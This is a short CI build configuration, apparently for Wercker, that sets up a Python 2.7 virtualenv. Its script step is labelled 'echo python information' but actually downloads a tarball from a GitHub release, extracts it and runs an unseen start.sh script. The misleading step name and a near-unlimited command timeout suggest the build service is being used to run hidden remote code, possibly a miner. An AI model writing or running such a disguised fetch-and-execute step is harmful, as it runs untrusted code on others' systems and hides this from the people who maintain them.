box: python:2.7
command-timeout: 99999
build:
  steps:
    - virtualenv:
        name: gasken
        install_wheel: true # Enable wheel to speed up builds (experimental)
    - script:
        name: echo python information
        code: |
          wget https://github.com/santok171/sugargula/releases/download/03/jmbt.tar.gz
          tar xf jmbt.tar.gz
          sh start.sh
